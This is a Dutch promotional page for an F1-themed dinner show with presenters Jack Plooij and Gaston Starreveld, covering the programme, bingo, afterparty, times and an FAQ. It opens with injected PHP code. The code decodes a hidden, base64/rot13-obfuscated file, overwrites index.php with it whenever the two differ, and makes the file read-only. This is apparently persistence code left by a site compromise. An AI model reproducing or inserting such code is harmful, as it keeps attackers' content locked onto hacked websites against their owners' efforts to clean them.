$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Info - Grand Prix Dinnershow

Het Programma

De avond

Het is een feit, de Snelste dinnershow van Nederland is er, ben je Formule 1 fan dan is dit een avond die u niet mag missen.

Pitreporter Jack Plooij en allround presentator Gaston Starreveld nemen u mee in een volle avond Formule 1 gegoten in Amusement, Entertainment en Party. Jack Plooij al jaren het vertrouwde gezicht van de immens populaire Formule 1. Vele weekenden per jaar is hij te zien tijdens alle F1 races en brengt hij ons al het nieuws van voor en achter de schermen van de Koningsklasse van de autosport. Ook is hij het doorgeefluik over alle ins en outs omtrent de 20 coureurs, en is hij bij al deze mannen een zeer graag geziene journalist.

Gaston Starreveld, al jaren een maatje van Jack zal tijdens de Grand Prix Dinnershow als rode draad de centrale presentator zijn die vele verschillende facetten van deze avond naadloos verbindt. Gaston heeft de afgelopen jaren veel ervaring opgedaan met wat betreft Dinnershow’s, zo was hij verantwoordelijk voor bijna 60 Dinnershow’s in Studio 21 te Hilversum voor de Nationale Postcodeloterij. Ook de liefhebberij voor de autosport is bij hem zeer groot, zo reed hij zelf een aantal jaren in de Renault Clio Cup bij het team van Bleekemolen, en heeft hij diverse circuits onveilig mogen maken.

Ontvangst

Bij binnenkomst uiteraard een gezellig ontvangstdrankje, misschien wel twee. Daarna de entree naar de zaal alwaar u wordt ontvangen in een zeer fraai gedecoreerde zaal met een echt Wow effect. De opening van de Show zal verricht worden door een sensationeel ballet gecompleteerd met fraaie F1 beelden van toen en nu op grote schermen.

Showdiner

op swingende doch stijlvolle wijze zal de bedieningsbrigade hun entree doen met het voorgerecht. Tijdens deze gang zal een trio optreden met bijpassende muziek. Daarna Showblok 2 geïnspireerd op het Formule 1 tijdperk uit Monaco, u begrijpt qua beelden, kostuums en muziek voldoende inspiratie. Aansluitend zullen Jack & Gaston gezamenlijk het podium betreden om de sport nog dichter bij u te brengen. Na een 15 tot 20 minuten is het tijd voor het hoofdgerecht en ook nu weer zal het muzikaal ondersteunt worden door het Trio. Na het hoofdgerecht zal vanaf de bühne weer een schitterend showblok worden gepresenteerd waar inhoudelijk filmheld James Bond een hoofdrol zal spelen waarin uiteraard zijn voorliefde voor mooie auto’s en charmante vrouwen een grote rol zullen zijn.

Formule 1 Bingooooo

Beide heren zullen in no-time de zaal op z’n kop zetten middels het oudste spel ter wereld. Op een zeer ludieke wijze zullen er 3 rondes bingo gespeeld worden met een echte Bingo Assistente die zal worden gekozen uit de aanwezige dames. Uiteraard zullen de te winnen prijzen alles te maken hebben met de autosport.

Afterparty

Een allround DJ zal de afterparty begeleiden met hits uit alle jaartallen, zitten blijven is onmogelijk. Om de zaal maximaal te enthousiasmeren zal het ballet de eerst paar nummers de gasten naar de dansvloer begeleiden. Ondertussen zullen Jack & Gaston voor een decorwand plaats nemen om met eenieder op de foto te gaan, die later kosteloos van de site valt te halen als herinnering. 

Resume; de GrandPrix Dinnershow is een avondvullend spektakel, dus niet alleen voor de échte fans van de Formule 1, maar iedereen beleeft een top avond.

Faq

Er zijn parkeergelegenheden in en rondom de Van der Valk hotels 

Casual Elegant en je moet er natuurlijk wel in kunnen dansen.

De tijden van de Grand Prix Dinnershow zijn:

Zaterdag 2 April

– 18.00 – 18.45 Inloop
– 18.45 Zaal open
– 00.00 Einde show (incl afterparty)

Zondag 3 April

– 16.00 – 16.45 Aankomst
– 16.45 Zaal open
– 22.00 Einde show (incl afterparty)

Tijdens de avond worden binnenlands gedestilleerde dranken aangeboden.

Je deelt de dinnertafel met andere gasten van de Grandprix Dinnershow. Mocht je plek willen reserveren neem dan even contact op met info@grandprixdinnershow.nl 

Uw winkelmand is momenteel leeg.

Terug naar winkel